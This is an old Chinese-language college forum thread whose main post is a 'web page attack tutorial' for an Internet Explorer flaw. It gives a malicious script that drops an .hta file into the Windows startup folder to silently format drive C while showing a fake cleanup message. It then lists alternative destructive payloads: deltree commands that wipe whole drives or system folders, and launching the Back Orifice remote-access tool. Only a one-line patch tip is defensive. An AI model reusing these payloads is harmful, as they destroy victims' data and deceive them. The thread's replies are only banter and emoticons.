广西经贸职业技术学院论坛
标题:
网页攻击教学
[打印本页]
作者:
saviour
时间:
2004-6-18 11:04
标题:
网页攻击教学
这项技术是在没多久以前台湾所流行的攻击法,你知道利用漏洞的厉害在哪吗? </p><p> 这一项教学就是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的 <br/> 攻击方法。 </p><p> 教学开始∶ </p><p> 以下这段就是具有破坏性的HTML </p><p> </p><p> <br/> Hacking Your Computer . </p><p> </p><p> scr.Reset(); <br/> scr.Path="quot;C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"quot;; <br/> scr.Doc="quot; <br/> wsh.Run('start.exe /m format c:/q /autotest /u'); <br/> alert('IMPORTANT : Windows is removing unused temporary files.');"quot;; <br/> scr.write(); </p><p> </p><p> <br/> (懂HTML的人应该就看得出来其中精随) </p><p> 现在我大概来解释其中几个项目所写的意思 </p><p> scr.Path="quot;C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"quot; </p><p> 这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为 <br/> hack.hta </p><p> wsh.Run('start.exe /m format c:/q /autotest /u'); </p><p> 通常要格式化硬碟都会先问你是否要执行,但其中的"quot;/autotest"quot;这项。 </p><p> 它是一个微软没有公开的功能,键入後format的动作便会被强制执行。 </p><p> 这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。 </p><p> 最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小 <br/> 化的状态。 </p><p> 执行其他攻击指令的方法∶ </p><p> 只要修改“start.exe /m format c:/q /autotest /u”这一项便形。 </p><p> start.exe /m format c:/q /autotest /u </p><p> 其中的“c:”可以换做其他的硬碟。 </p><p> (path)\bo2k.exe </p><p> 执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。 </p><p> start.exe /m deltree /y a:\*.* c:\*.* d:\*.* </p><p> 杀掉对方硬碟底下所有的档案。 </p><p> start.exe /m deltree /y c:\windows\system\*.* </p><p> 杀掉对方c:\windows\system\目录底下的所有档案。 </p><p> 後叙∶ </p><p> 预防遭此手段的破坏就是到微软去更新你的浏览器。 <br/>
作者:
々木飞々
时间:
2004-6-18 11:06
提示:
作者被禁止或删除 内容自动屏蔽
作者:
saviour
时间:
2004-6-18 11:07
嘻嘻<br/> 我以前可是这里的版主呀<br/> 找帖肯定好过你啦
作者:
々木飞々
时间:
2004-6-18 11:09
提示:
作者被禁止或删除 内容自动屏蔽
作者:
天才与我无缘
时间:
2004-6-18 13:50
[emb7][emb7][emb7]
作者:
saviour
时间:
2004-6-21 10:13
[emb7]
作者:
saviour
时间:
2004-6-22 08:07
[emb11]
欢迎光临 广西经贸职业技术学院论坛 (http://gxjmbbs.com/)
Powered by Discuz! X3.2